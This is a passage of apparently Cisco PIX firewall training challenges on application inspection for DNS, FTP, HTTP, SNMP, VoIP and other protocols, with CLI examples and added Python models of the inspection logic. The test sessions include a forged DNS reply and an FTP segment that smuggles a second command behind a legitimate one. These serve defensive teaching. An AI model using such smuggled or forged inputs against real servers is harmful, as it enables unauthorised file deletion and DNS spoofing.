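    reply = build_dns_message(0x1234, "www.example.com", "192.0.2.10")
    forged = build_dns_message(0x4444, "www.example.com", "198.51.100.1")
    verdicts = [
        guard.inspect(client, query, True)[0],
        guard.inspect(client, forged, False)[0],        # ID never seen from this client
        guard.inspect(client, reply, False)[0],
        guard.inspect(client, reply, False)[0],         # replayed after the first
        guard.inspect(client, reply + b"\x00" * 1500, False)[0],
    ]
    return verdicts


if __name__ == "__main__":
    print(demo())   # ['forward', 'drop', 'forward', 'drop', 'drop']
```

The model keys outstanding queries on client address and transaction ID only; the real firewall tracks the full UDP 5-tuple, which is stricter and which a production implementation should use.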

Cisco PIX Challenge 82


Outline
FTP inspection allows the firewall to open the dynamically negotiated data connection, and
tracks the FTP command/response sequence for possibly invalid commands. It can also create
an audit trail and translate (NAT) the IP addresses embedded in PORT commands and PASV
replies. The strict option additionally blocks pipelined or embedded commands, and applies
the command restrictions defined in an FTP map.
Objectives
The objectives of this challenge are to:

Define interesting FTP traffic (TCP port 21).


Define an FTP map.
Define a policy map.
Define FTP inspection.
Apply the policy map.

Example

# config t
pixfirewall(config)# class-map ctest
pixfirewall(config-cmap)# match port tcp eq 21
pixfirewall(config-cmap)# exit
pixfirewall(config)# ftp-map ftest
pixfirewall(config-ftp-map)# ?
Ftp-map configuration commands:
mask-syst-reply  Mask reply to syst command
no               Negate a command or set its defaults
request-command  FTP request command inspection
pixfirewall(config-ftp-map)# request-command ?
ftp-map mode commands/options:
deny Specify FTP request commands to block
pixfirewall(config-ftp-map)# request-command deny ?
ftp-map mode commands/options:
appe  Append to a file
cdup  Change to parent of current directory
dele  Delete a file at server site
get   FTP client command for the retr command - retrieve a file
help  Help information from server
mkd   Create a directory
put   FTP client command for the stor command - store a file
rmd   Remove a directory
rnfr  Rename from
rnto  Rename to
site  Specify server specific command
stou  Store a file with a unique name
pixfirewall(config-ftp-map)# request-command deny cdup


pixfirewall(config-ftp-map)# exit
pixfirewall(config)# policy-map ptest
pixfirewall(config-pmap)# class ctest
pixfirewall(config-pmap-c)# inspect ftp ?
mpf-policy-map-class mode commands/options:
strict Prevent web browsers from sending embedded commands
in FTP requests
<cr>
pixfirewall(config-pmap-c)# inspect ftp strict ?
mpf-policy-map-class mode commands/options:
WORD < 64 char Optional ftp-map name
<cr>
pixfirewall(config-pmap-c)# inspect ftp strict ftest
pixfirewall(config-pmap-c)# exit
pixfirewall(config-pmap)# exit
pixfirewall(config)# service-policy ptest interface outside
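What the strict option and the ftp-map deny list do to the control channel, as an added Python model (example code, not from the original challenge and not the PIX implementation). The session below is constructed; the set of accepted verbs, the 'drop' verdict and the PORT pinhole bookkeeping are assumptions made for the example.

```python
# ftp-map keywords from the challenge and the FTP verbs they stand for;
# 'get' and 'put' are the client-side names for RETR and STOR.
FTP_MAP_COMMANDS = {
    "appe": "APPE", "cdup": "CDUP", "dele": "DELE", "get": "RETR",
    "help": "HELP", "mkd": "MKD", "put": "STOR", "rmd": "RMD",
    "rnfr": "RNFR", "rnto": "RNTO", "site": "SITE", "stou": "STOU",
}

# RFC 959 verbs plus common extensions accepted on the control channel (assumed list).
KNOWN_VERBS = {
    "USER", "PASS", "ACCT", "CWD", "CDUP", "QUIT", "PORT", "PASV", "TYPE",
    "MODE", "STRU", "RETR", "STOR", "STOU", "APPE", "ALLO", "REST", "RNFR",
    "RNTO", "ABOR", "DELE", "RMD", "MKD", "PWD", "LIST", "NLST", "SITE",
    "SYST", "STAT", "HELP", "NOOP", "FEAT", "EPRT", "EPSV",
}


def parse_port_argument(arg):
    """Decode the h1,h2,h3,h4,p1,p2 argument of PORT into (ip, port).
    This is the client endpoint the firewall must open a pinhole for."""
    fields = arg.strip().split(",")
    if len(fields) != 6 or not all(f.isdigit() and int(f) <= 255 for f in fields):
        return None
    return ".".join(fields[:4]), int(fields[4]) * 256 + int(fields[5])


class FtpInspector:
    """Hypothetical model of 'inspect ftp strict <ftp-map>'.

    strict: each client segment must be exactly one CRLF-terminated command,
    and a new command is not accepted until the server has answered the
    previous one, which blocks pipelined and embedded commands.
    The ftp-map 'request-command deny' list blocks individual verbs.
    Verdicts are 'forward' or 'drop' (the exact action of the real firewall
    on a violation is not modelled).
    """

    def __init__(self, deny_keywords=(), strict=True):
        self.denied = {FTP_MAP_COMMANDS[k] for k in deny_keywords}
        self.strict = strict
        self.awaiting_reply = False
        self.data_channels = []     # (ip, port) pinholes learned from PORT

    def inspect_request(self, segment):
        if self.strict:
            if not segment.endswith(b"\r\n") or segment.count(b"\r\n") != 1:
                return "drop", "strict: segment is not exactly one CRLF-terminated command"
            if self.awaiting_reply:
                return "drop", "strict: command sent before the previous reply"
        verb, _, arg = segment.rstrip(b"\r\n").decode("ascii", "replace").partition(" ")
        verb = verb.upper()
        if verb not in KNOWN_VERBS:
            return "drop", "unknown FTP command %r" % verb
        if verb in self.denied:
            return "drop", "%s denied by ftp-map request-command" % verb
        if verb == "PORT":
            endpoint = parse_port_argument(arg)
            if endpoint is None:
                return "drop", "malformed PORT argument"
            self.data_channels.append(endpoint)
        self.awaiting_reply = True
        return "forward", verb

    def inspect_reply(self, segment):
        """A server reply clears the strict-mode lock so the next command may pass."""
        self.awaiting_reply = False
        return "forward", segment[:3].decode("ascii", "replace")


def demo():
    """Replay a constructed session through an inspector configured as in the
    challenge ('request-command deny cdup', strict on)."""
    fw = FtpInspector(deny_keywords=["cdup"], strict=True)
    session = [
        ("c", b"USER anonymous\r\n"), ("s", b"331 Please specify the password.\r\n"),
        ("c", b"PASS guest\r\n"),      ("s", b"230 Login successful.\r\n"),
        ("c", b"CDUP\r\n"),                                  # denied by the ftp-map
        ("c", b"PORT 10,0,0,5,4,1\r\n"), ("s", b"200 PORT command successful.\r\n"),
        ("c", b"RETR a.txt\r\nDELE a.txt\r\n"),              # two commands in one segment
        ("c", b"RETR a.txt"),                                # truncated: no CRLF
    ]
    verdicts = [fw.inspect_request(seg)[0] if who == "c" else fw.inspect_reply(seg)[0]
                for who, seg in session]
    return verdicts, fw.data_channels


if __name__ == "__main__":
    print(demo())
```

The two-commands-in-one-segment case is the one strict mode exists for: a browser or a script that smuggles a second command behind a legitimate one would otherwise have both executed by the server.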

Cisco PIX Challenge 83


Outline
GTP allows data to be tunneled through a GSM network (UMTS/GPRS). GTP inspection
allows the firewall to check the details of these connections.

Objectives
The objectives of this challenge are to:

Define interesting GTP traffic (UDP ports 3386 and 2123).


Define a GTP map.
Define a policy map.
Define GTP inspection.
Apply the policy map.

Note: An access-list is required in this case, instead of a match port command in the
class-map, because GTP uses two UDP ports (2123 for GTP-C and 3386 for GTP'). A class map
normally carries a single match statement (match tunnel-group is the exception, which may
be combined with one other match), and match port takes one port or one contiguous range.
An access-list with one entry per port, referenced by match access-list, identifies both.
The match default-inspection-traffic keyword shown in the help output below already
covers gtp on UDP 2123 and 3386 and is the other way to classify this traffic.
Example
# config t
pixfirewall(config)# access-list atest permit udp any any eq 2123
pixfirewall(config)# access-list atest permit udp any any eq 3386
pixfirewall(config)# class-map ctest
pixfirewall(config-cmap)# match ?
mpf-class-map mode commands/options:
access-list                 Match an Access List
any                         Match any packet
default-inspection-traffic  Match default inspection traffic:
    ctiqbe----tcp--2748       dns-------udp--53
    ftp-------tcp--21         gtp-------udp--2123,3386
    h323-h225-tcp--1720       h323-ras--udp--1718-1719
    http------tcp--80         icmp------icmp
    ils-------tcp--389        mgcp------udp--2427,2727
    netbios---udp--137-138    rpc-------udp--111
    rsh-------tcp--514        rtsp------tcp--554
    sip-------tcp--5060       sip-------udp--5060
    skinny----tcp--2000       smtp------tcp--25
    sqlnet----tcp--1521       tftp------udp--69
    xdmcp-----udp--177
dscp                        Match IP DSCP (DiffServ CodePoints)
flow                        Flow based Policy
port                        Match TCP/UDP port(s)
precedence                  Match IP precedence
rtp                         Match RTP port numbers
tunnel-group                Match a Tunnel Group
pixfirewall(config-cmap)# match access-list ?
mpf-class-map mode commands/options:
WORD Access List name
pixfirewall(config-cmap)# match access-list atest
pixfirewall(config-cmap)# exit
pixfirewall(config)# gtp-map gtest
pixfirewall(config-gtp-map)# ?
description      GTP configuration map description
drop             Message ID, APN or GTP version to drop
help             Displays help
mcc              Three-digit mobile country code (000-999)
message-length   Message length max and min values
permit errors    Permits packets with errors
permit response  Permit GSN load balancing
request-queue    Maximum requests for the queue
timeout          Idle timeout
tunnel-limit     Maximum number of tunnels
pixfirewall(config-gtp-map)# request-queue 100
pixfirewall(config-gtp-map)# mcc 044
pixfirewall(config-gtp-map)# message-length min 10 max 1000
pixfirewall(config-gtp-map)# tunnel-limit 10000
pixfirewall(config-gtp-map)# exit
pixfirewall(config)# policy-map ptest
pixfirewall(config-pmap)# class ctest
pixfirewall(config-pmap-c)# inspect gtp gtest
pixfirewall(config-pmap-c)# exit
pixfirewall(config-pmap)# exit
pixfirewall(config)# service-policy ptest interface outside

Cisco PIX Challenge 84


Outline
H.323 is a wide ranging protocol suite which supports many types of video and voice
communications.
Objectives
The objectives of this challenge are to:

Define interesting H.323 traffic (TCP port 1720 for H.225 call signalling and UDP ports 1718-1719 for RAS).


Define a policy map.
Define H.323 inspection.
Apply the policy map.

Note: An access-list is required in this case, instead of a match port command in the
class-map, because H.323 signalling uses two different transports: H.225 call setup on
TCP 1720 and RAS (gatekeeper registration) on UDP 1718-1719. A class map normally carries
a single match statement (match tunnel-group is the exception, which may be combined with
one other match), so an access-list with one entry per protocol is referenced instead.
Example
# config t
pixfirewall(config)# access-list atest permit tcp any any eq 1720
pixfirewall(config)# access-list atest permit udp any any range 1718 1719
pixfirewall(config)# class-map ctest
pixfirewall(config-cmap)# match ?
mpf-class-map mode commands/options:
access-list                 Match an Access List
any                         Match any packet
default-inspection-traffic  Match default inspection traffic:
    ctiqbe----tcp--2748       dns-------udp--53
    ftp-------tcp--21         gtp-------udp--2123,3386
    h323-h225-tcp--1720       h323-ras--udp--1718-1719
    http------tcp--80         icmp------icmp
    ils-------tcp--389        mgcp------udp--2427,2727
    netbios---udp--137-138    rpc-------udp--111
    rsh-------tcp--514        rtsp------tcp--554
    sip-------tcp--5060       sip-------udp--5060
    skinny----tcp--2000       smtp------tcp--25
    sqlnet----tcp--1521       tftp------udp--69
    xdmcp-----udp--177
dscp                        Match IP DSCP (DiffServ CodePoints)
flow                        Flow based Policy
port                        Match TCP/UDP port(s)
precedence                  Match IP precedence
rtp                         Match RTP port numbers
tunnel-group                Match a Tunnel Group
pixfirewall(config-cmap)# match access-list ?
mpf-class-map mode commands/options:
WORD Access List name
pixfirewall(config-cmap)# match access-list atest
pixfirewall(config-cmap)# exit
pixfirewall(config)# policy-map ptest
pixfirewall(config-pmap)# class ctest
pixfirewall(config-pmap-c)# inspect h323 ?
mpf-policy-map-class mode commands/options:
h225 Enable H.225 signalling inspection
ras
Enable RAS inspection
pixfirewall(config-pmap-c)# inspect h323 ras
pixfirewall(config-pmap-c)# inspect h323 h225
pixfirewall(config-pmap-c)# exit
pixfirewall(config-pmap)# exit
pixfirewall(config)# service-policy ptest interface outside

Cisco PIX Challenge 85


Outline
HTTP inspection allows the firewall to detect malformed or malicious use of the HTTP protocol,
such as oversized URIs and headers, disallowed request methods, out-of-range content lengths,
and responses whose content type does not match what the client asked for. The limits are
defined in an HTTP map and applied with inspect http.
Objectives
The objectives of this challenge are to:

Define a policy map.


Define HTTP inspection.
Apply the policy map.

Example
# config t
pixfirewall(config)# class-map ctest
pixfirewall(config-cmap)# match port tcp eq 80
pixfirewall(config-cmap)# exit
pixfirewall(config)# http-map htest
pixfirewall(config-http-map)# ?
Http-map configuration commands:
content-length             Content length range inspection
content-type-verification  Content type inspection
max-header-length          Maximum header size inspection
max-uri-length             Maximum URI size inspection
no                         Negate a command or set its defaults
port-misuse                Application inspection
request-method             Request method inspection
strict-http                Strict HTTP inspection
transfer-encoding          Transfer encoding inspection
pixfirewall(config-http-map)# content-l ?
http-map mode commands/options:
max Maximum content length allowed
min Minimum content length allowed
pixfirewall(config-http-map)# content-l min ?
http-map mode commands/options:
<1-65535> Number of bytes
pixfirewall(config-http-map)# content-l min 1 ?
http-map mode commands/options:
action Action taken when a violation occurs
max
Maximum content length allowed
pixfirewall(config-http-map)# content-l min 1 max ?
http-map mode commands/options:
<1-50000000> Number of bytes
pixfirewall(config-http-map)# content-l min 1 max 1000 ?
http-map mode commands/options:
action Action taken when a violation occurs
pixfirewall(config-http-map)# content-l min 1 max 1000 action ?
http-map mode commands/options:
allow Allow the message
drop
Close the connection
reset Close the connection with a TCP reset message
pixfirewall(config-http-map)# content-l min 10 max 1000 action reset
pixfirewall(config-http-map)# content-type-verification ?
http-map mode commands/options:
action
Action taken when a violation occurs
match-req-rsp Check response matches ACCEPT value in request message
pixfirewall(config-http-map)# content-type-verification match ?
http-map mode commands/options:
action Action taken when a violation occurs

pixfirewall(config-http-map)# content-type-verification match action ?
http-map mode commands/options:
allow  Allow the message
drop   Close the connection
reset  Close the connection with a TCP reset message
pixfirewall(config-http-map)# content-type-verification match action reset ?
http-map mode commands/options:
log Generate a log message
<cr>
pixfirewall(config-http-map)# content-type-verification match action reset log ?
http-map mode commands/options:
<cr>
pixfirewall(config-http-map)# content-type-verification match action reset log
pixfirewall(config-http-map)# max-header-length request 100 action reset log
pixfirewall(config-http-map)# max-uri 100 action reset log
pixfirewall(config-http-map)# exit
pixfirewall(config)# policy-map ptest
pixfirewall(config-pmap)# class ctest
pixfirewall(config-pmap-c)# inspect http htest
pixfirewall(config-pmap-c)# exit
pixfirewall(config-pmap)# exit
pixfirewall(config)# service-policy ptest interface outside
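The checks the http-map above configures, applied to raw requests, as an added Python model (example code, not from the original challenge and not the PIX implementation). The requests are constructed; the allowed-method set, how header bytes are counted against max-header-length, and the wildcard handling in the Accept match are assumptions made for the example.

```python
class HttpMap:
    """Hypothetical model of the http-map checks from the challenge: content-length
    min/max, max-uri-length, max-header-length request, request-method, strict-http
    framing, and content-type-verification match-req-rsp. All violations are
    reported; the configured action ('reset' in the challenge) is returned when
    at least one occurs."""

    def __init__(self, content_min=10, content_max=1000, max_uri=100,
                 max_request_header=100, allowed_methods=("GET", "HEAD", "POST"),
                 action="reset"):
        self.content_min, self.content_max = content_min, content_max
        self.max_uri = max_uri
        self.max_request_header = max_request_header
        self.allowed_methods = set(allowed_methods)   # assumed request-method policy
        self.action = action

    @staticmethod
    def parse_request(raw):
        """Strict-HTTP framing: a request line of three tokens with an HTTP/1.x
        version, 'Name: value' header lines with no leading whitespace, and
        headers terminated by CRLF CRLF. Returns (request, None) or (None, error)."""
        head, sep, body = raw.partition(b"\r\n\r\n")
        if not sep:
            return None, "headers not terminated by CRLF CRLF"
        lines = head.split(b"\r\n")
        parts = lines[0].split(b" ")
        if len(parts) != 3 or not parts[2].startswith(b"HTTP/1."):
            return None, "malformed request line"
        headers = {}
        for line in lines[1:]:
            name, colon, value = line.partition(b":")
            if not colon or not name.strip() or name != name.strip():
                return None, "malformed header line %r" % line
            headers[name.decode("ascii", "replace").lower()] = value.strip().decode("latin-1")
        return {
            "method": parts[0].decode("ascii", "replace"),
            "uri": parts[1].decode("latin-1"),
            "headers": headers,
            "header_bytes": len(head) + 4,    # request line + headers + terminator (assumption)
            "body": body,
        }, None

    def inspect_request(self, raw):
        req, err = self.parse_request(raw)
        if err:
            return self.action, ["strict-http: " + err]
        violations = []
        if req["method"] not in self.allowed_methods:
            violations.append("request-method: %s not permitted" % req["method"])
        if len(req["uri"]) > self.max_uri:
            violations.append("max-uri-length: %d > %d" % (len(req["uri"]), self.max_uri))
        if req["header_bytes"] > self.max_request_header:
            violations.append("max-header-length: %d > %d"
                              % (req["header_bytes"], self.max_request_header))
        length = req["headers"].get("content-length")
        if length is not None:
            if not length.isdigit():
                violations.append("content-length: non-numeric value %r" % length)
            elif not self.content_min <= int(length) <= self.content_max:
                violations.append("content-length: %s outside %d-%d"
                                  % (length, self.content_min, self.content_max))
        return (self.action if violations else "allow"), violations

    @staticmethod
    def content_type_matches(accept, content_type):
        """content-type-verification match-req-rsp: the response Content-Type must be
        covered by the request's Accept header (type/subtype, '*' wildcards allowed;
        parameters such as charset or q are ignored)."""
        ct_major, _, ct_sub = content_type.split(";")[0].strip().lower().partition("/")
        for item in accept.split(","):
            a_major, _, a_sub = item.split(";")[0].strip().lower().partition("/")
            if a_major in ("*", ct_major) and a_sub in ("*", ct_sub):
                return True
        return False
```

The max-header-length request 100 from the challenge is tiny (a bare GET with a Host header is already around 40 bytes), so in practice the request limit is tuned against real browser traffic before the action is set to reset; the model takes the limit as a parameter for that reason.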

10 TCP/IP services reference

Port  Service      Comment
1     TCPmux
7     echo
9     discard      Null
11    systat       Users
13    daytime
15    netstat
17    qotd         Quote
18    msp          Message send protocol
19    chargen      ttytst source
21    ftp
23    telnet
25    smtp         Mail
37    time         Timserver
39    rlp          Resource location
42    nameserver   IEN 116
43    whois        Nicname
53    domain       DNS
57    mtp          Deprecated
67    bootps       BOOTP server
68    bootpc       BOOTP client
69    tftp
70    gopher       Internet Gopher
77    rje          Netrjs
79    finger
80    www          WWW HTTP
87    link         Ttylink
88    kerberos     Kerberos v5
95    supdup
101   hostnames
102   iso-tsap     ISODE
105   csnet-ns     CSO name server
107   rtelnet      Remote Telnet
109   pop2         POP version 2
110   pop3         POP version 3
111   sunrpc
113   auth         Rap ID
115   sftp
117   uucp-path
119   nntp         USENET
123   ntp          Network Time
137   netbios-ns   NETBIOS Name Service
138   netbios-dgm  NETBIOS datagram
139   netbios-ssn  NETBIOS session
143   imap2
161   snmp         SNMP
162   snmp-trap    SNMP trap
163   cmip-man     ISO management over IP
164   cmip-agent
177   xdmcp        X Display Manager
178   nextstep     NeXTStep
179   bgp          BGP
191   prospero
194   irc          Internet Relay Chat
199   smux         SNMP Multiplexer
201   at-rtmp      AppleTalk routing
202   at-nbp       AppleTalk name binding
204   at-echo      AppleTalk echo
206   at-zis       AppleTalk zone information
210   z3950        NISO Z39.50 database
213   ipx          IPX
220   imap3        Interactive Mail Access
372   ulistserv    UNIX Listserv
512   exec         Comsat
513   login
513   who          Whod
514   shell        No passwords used
514   syslog
515   printer      Line printer spooler
517   talk
518   ntalk
520   route        RIP
525   timed        Timeserver
526   tempo        Newdate
530   courier      Rpc
531   conference   Chat
532   netnews      Readnews

Cisco PIX Challenge 86


Outline
MGCP (Media Gateway Control Protocol) is used by call agents to control media gateways,
which carry voice trunks between telephone exchanges and IP networks. This challenge
involves defining MGCP inspection.
Objectives

The objectives of this challenge are to:

Define interesting traffic (normally UDP ports 2427 and 2727).


Define a policy map.
Define MGCP inspection.
Apply the policy map.

Example
# config t
pixfirewall(config)# access-list atest permit udp any any eq 2427
pixfirewall(config)# access-list atest permit udp any any eq 2727
pixfirewall(config)# class-map ctest
pixfirewall(config-cmap)# match access-list atest
pixfirewall(config-cmap)# exit
pixfirewall(config)# mgcp-map mtest
pixfirewall(config-mgcp-map)# ?
mgcp-map configuration commands:
call-agent     Add a Call-Agent
command-queue  Configure Command Queue
gateway        Add a Gateway
help           Help for mgcp-map configuration commands
no             Negate or set default values of a command
pixfirewall(config-mgcp-map)# call-agent ?
mgcp-map mode commands/options:
A.B.C.D IP address
pixfirewall(config-mgcp-map)# call-agent 1.2.3.4 ?
mgcp-map mode commands/options:
<0-2147483647> ID of the group
pixfirewall(config-mgcp-map)# call-agent 1.2.3.4 111
pixfirewall(config-mgcp-map)# command-queue ?
mgcp-map mode commands/options:
<1-2147483647> Command limit
pixfirewall(config-mgcp-map)# command-queue 100
pixfirewall(config-mgcp-map)# gateway ?
mgcp-map mode commands/options:
A.B.C.D IP address
pixfirewall(config-mgcp-map)# gateway 1.2.3.5 111
pixfirewall(config-mgcp-map)# exit
pixfirewall(config)# policy-map ptest
pixfirewall(config-pmap)# class ctest
pixfirewall(config-pmap-c)# inspect mgcp mtest
pixfirewall(config-pmap-c)# exit
pixfirewall(config-pmap)# exit
pixfirewall(config)# service-policy ptest global

Cisco PIX Challenge 87


Outline
RTSP is used in streaming audio and video applications, such as for RealPlayer.
Objectives
The objectives of this challenge are to:

Define interesting traffic (normally TCP port 554, with 8554 as a common alternate).


Define a policy map.
Define RTSP inspection.
Apply the policy map.

Example
# config t
pixfirewall(config)# access-list atest permit tcp any any eq 554
pixfirewall(config)# access-list atest permit tcp any any eq 8554
pixfirewall(config)# class-map ctest
pixfirewall(config-cmap)# match access-list atest
pixfirewall(config-cmap)# exit
pixfirewall(config)# policy-map ptest
pixfirewall(config-pmap)# class ctest
pixfirewall(config-pmap-c)# inspect rtsp
pixfirewall(config-pmap-c)# exit
pixfirewall(config-pmap)# exit
pixfirewall(config)# service-policy ptest global

Cisco PIX Challenge 88


Outline
SIP is used to set up and tear down calls in voice-over-IP applications. This challenge involves SIP inspection.
Objectives
The objectives of this challenge are to:

Define interesting traffic (normally port 5060; SIP runs over UDP or TCP, and the example matches TCP).


Define a policy map.
Define SIP inspection.

Apply the policy map.


Define SIP timeout.

Example
# config t
pixfirewall(config)# class-map ctest
pixfirewall(config-cmap)# match port tcp eq 5060
pixfirewall(config-cmap)# exit
pixfirewall(config)# policy-map ptest
pixfirewall(config-pmap)# class ctest
pixfirewall(config-pmap-c)# inspect sip
pixfirewall(config-pmap-c)# exit
pixfirewall(config-pmap)# exit
pixfirewall(config)# service-policy ptest global
pixfirewall(config)# timeout ?
configure mode commands/options:
conn         Configure idle time after which a TCP connection state
             will be closed, default is 1:00:00
h225         Configure idle time after which an H.225 signaling conn
             will be closed, default is 1:00:00
h323         Configure idle time after which an H.323 control connection
             will be closed, default is 0:05:00
half-closed  Configure idle time after which a TCP half-closed connection
             will be freed, default is 0:10:00
icmp         Configure idle timeout for ICMP, default is 0:00:02
mgcp         Configure idle time after which an MGCP media connection
             will be closed, default is 0:05:00
mgcp-pat     Configure the time after which an MGCP PAT Xlate
             will be removed, default is 0:05:00
sip          Configure idle time after which a SIP control connection
             will be closed, default is 0:30:00
sip_media    Configure idle time after which a SIP Media connection
             will be closed, default is 0:02:00
sunrpc       Configure idle time after which a SUNRPC slot
             will be closed, default is 0:10:00
uauth        Configure idle time after which an authentication will no
             longer be cached and the user will need to re-authenticate on
             their connection, default is 0:05:00. The default uauth timer
             is absolute.
udp          Configure idle time after which general UDP states
             will be closed, default is 0:02:00. This timer does not
             apply to DNS or SUNRPC
xlate        Configure idle time after which a dynamic address
             will be returned to the free pool, default is 3:00:00
pixfirewall(config)# timeout sip ?
configure mode commands/options:
0:0:0 | <0:5:0> - <1192:59:59>  Idle time after which a SIP control
                                connection will be closed, default is 0:30:00
<0-0>                           Specify this value to never time out
pixfirewall(config)# timeout sip 0:15:00

Also:
pixfirewall(config)# timeo sip_media ?
configure mode commands/options:
0:0:0 | <0:1:0> - <1192:59:59>  Idle time after which a SIP Media connection
                                will be closed, default is 0:02:00
<0-0>                           Specify this value to never time out

Cisco PIX Challenge 89


Outline
SCCP (Skinny Client Control Protocol) is a simple protocol used between Cisco IP phones
and Cisco CallManager in voice-over-IP applications. This challenge involves SCCP inspection.
Objectives
The objectives of this challenge are to:

Define interesting traffic (normally TCP port 2000).


Define a policy map.
Define SCCP inspection.
Apply the policy map.

Example
# config t
pixfirewall(config)# class-map ctest
pixfirewall(config-cmap)# match port tcp eq 2000
pixfirewall(config-cmap)# exit
pixfirewall(config)# policy-map ptest
pixfirewall(config-pmap)# class ctest
pixfirewall(config-pmap-c)# inspect skinny
pixfirewall(config-pmap-c)# exit
pixfirewall(config-pmap)# exit
pixfirewall(config)# service-policy ptest global

Cisco PIX Challenge 90


Outline
SMTP is used to send email from a client to an SMTP server, and between servers. It can be
a vector for attack, for example by sending incorrectly formatted SMTP commands. Example
commands are DATA, HELO, MAIL, SEND, and so on. ESMTP inspection allows the firewall to
check for incorrectly formatted SMTP traffic. This includes:

Limiting the session to the seven basic SMTP commands (HELO, MAIL, RCPT, DATA, RSET,
NOOP, QUIT), plus the eight extended ESMTP ones (AUTH, EHLO, ETRN, HELP, SAML, SEND,
SOML, VRFY).
Monitoring the command-response phase, so that messages are not sent out of sequence.
Catching truncated commands.
Catching commands without a carriage-return/line-feed sequence.
And so on.

Objectives
The objectives of this challenge are to:

Define interesting traffic (normally TCP port 25).


Define a policy map.
Define SMTP inspection.
Apply the policy map.

Example
# config t
pixfirewall(config)# class-map ctest
pixfirewall(config-cmap)# match port tcp eq 25
pixfirewall(config-cmap)# exit
pixfirewall(config)# policy-map ptest
pixfirewall(config-pmap)# class ctest
pixfirewall(config-pmap-c)# inspect esmtp
pixfirewall(config-pmap-c)# exit
pixfirewall(config-pmap)# exit
pixfirewall(config)# service-policy ptest global


Cisco PIX Challenge 91


Outline
SNMP is used to read status and configuration information from networked devices (and, with
write access, to change it). Unfortunately the early versions have security problems: SNMPv1
and SNMPv2c send the community string, which is the only access credential, in clear text,
so anyone who can capture the traffic can reuse it. In this example SNMP Version 1 is blocked
by the firewall.
Objectives
The objectives of this challenge are to:

Define interesting traffic (normally UDP ports 161 and 162).
Define an SNMP map.
Define a policy map.
Define SNMP inspection.
Apply the policy map.

Example
# config t
pixfirewall(config)# access-list atest permit udp any any eq 161
pixfirewall(config)# access-list atest permit udp any any eq 162
pixfirewall(config)# class-map ctest
pixfirewall(config-cmap)# match access-list atest
pixfirewall(config-cmap)# exit
pixfirewall(config)# snmp-map stest
pixfirewall(config-snmp-map)# ?
snmp-map configuration commands:
deny  Deny SNMP traffic
help  Help for snmp-map configuration commands
no    Negate or set default values of a command
pixfirewall(config-snmp-map)# deny ?
snmp-map mode commands/options:
version Specify the version to deny
pixfirewall(config-snmp-map)# deny version ?
snmp-map mode commands/options:
1   SNMP version 1
2   SNMP version 2 (party based)
2c  SNMP version 2c (community based)
3   SNMP version 3
pixfirewall(config-snmp-map)# deny version 1
pixfirewall(config-snmp-map)# exit
pixfirewall(config)# policy-map ptest
pixfirewall(config-pmap)# class ctest
pixfirewall(config-pmap-c)# inspect snmp stest
pixfirewall(config-pmap-c)# exit
pixfirewall(config-pmap)# exit
pixfirewall(config)# service-policy ptest global

SNMP runs over UDP (161 for requests, 162 for traps), so the access-list matches udp; a tcp
match would never see SNMP traffic and the inspection would silently do nothing. Denying
version 1 alone still leaves v2c, whose community string is just as exposed, so in practice
the same snmp-map usually carries deny version 2c as well and only SNMPv3 is allowed through.
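Before the firewall can apply a deny version rule it has to find the version number inside the datagram, which is a BER-encoded SEQUENCE whose first element is an INTEGER holding the version. The following is an added example for this page, not PIX/ASA code: a minimal BER walk in Python that recovers the version (and, for v1/v2c, the community string) and returns the same permit/deny decision the snmp-map above expresses. The sample packets are constructed, and the version labels simply mirror the help text shown above.

```python
"""Minimal BER walk of an SNMP message to recover its version (and, for
v1/v2c, the community string).  Added illustration of what an SNMP
inspection engine must do before it can enforce "deny version"; it is not
PIX/ASA code and the packets below are constructed for the example."""


def _tlv(tag, content):
    """Encode one BER TLV (short or long-form length)."""
    n = len(content)
    if n < 0x80:
        return bytes([tag, n]) + content
    lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(lb)]) + lb + content


def _read_tlv(buf, pos):
    """Decode the TLV at buf[pos:]; return (tag, content, position after it)."""
    if pos + 2 > len(buf):
        raise ValueError("short TLV header")
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                         # long form: next n bytes hold the length
        n = length & 0x7F
        if n == 0 or n > 4 or pos + n > len(buf):
            raise ValueError("bad length encoding")
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    if pos + length > len(buf):
        raise ValueError("TLV runs past end of packet")
    return tag, buf[pos:pos + length], pos + length


VERSION_LABEL = {0: "1", 1: "2c", 2: "2", 3: "3"}   # labels as in the snmp-map help


def snmp_version(packet):
    """Return (version_label, community) for an SNMP message.  community is
    None for v3, whose header carries security parameters instead."""
    tag, body, end = _read_tlv(packet, 0)
    if tag != 0x30 or end != len(packet):
        raise ValueError("not an SNMP message SEQUENCE")
    tag, ver, pos = _read_tlv(body, 0)
    if tag != 0x02 or len(ver) != 1 or ver[0] not in VERSION_LABEL:
        raise ValueError("bad version field")
    community = None
    if ver[0] in (0, 1):
        tag, comm, _ = _read_tlv(body, pos)
        if tag != 0x04:
            raise ValueError("missing community string")
        community = comm.decode("latin-1")
    return VERSION_LABEL[ver[0]], community


def snmp_map_action(packet, denied_versions):
    """'deny' if the version is in denied_versions, or if the datagram does not
    parse as SNMP at all (fail closed); otherwise 'permit'."""
    try:
        version, _ = snmp_version(packet)
    except ValueError:
        return "deny"
    return "deny" if version in denied_versions else "permit"


# --- constructed sample packets: GetRequest for sysDescr.0 --------------------
def _get_request_v1_v2c(version_byte, community):
    varbind = _tlv(0x30, _tlv(0x06, bytes.fromhex("2b06010201010100")) + _tlv(0x05, b""))
    pdu = _tlv(0xA0, _tlv(0x02, b"\x01") + _tlv(0x02, b"\x00") + _tlv(0x02, b"\x00")
               + _tlv(0x30, varbind))
    return _tlv(0x30, _tlv(0x02, bytes([version_byte])) + _tlv(0x04, community) + pdu)


V1_GET = _get_request_v1_v2c(0, b"public")
V2C_GET = _get_request_v1_v2c(1, b"public")
# v3: version, msgGlobalData (msgID, msgMaxSize, msgFlags, msgSecurityModel),
# msgSecurityParameters, then the (here empty) scoped PDU.
V3_GET = _tlv(0x30, _tlv(0x02, b"\x03")
              + _tlv(0x30, _tlv(0x02, b"\x01") + _tlv(0x02, b"\x04\x00")
                     + _tlv(0x04, b"\x04") + _tlv(0x02, b"\x03"))
              + _tlv(0x04, b"") + _tlv(0x30, b""))

if __name__ == "__main__":
    for name, pkt in (("v1", V1_GET), ("v2c", V2C_GET), ("v3", V3_GET)):
        print(name, snmp_version(pkt), snmp_map_action(pkt, {"1"}))
```

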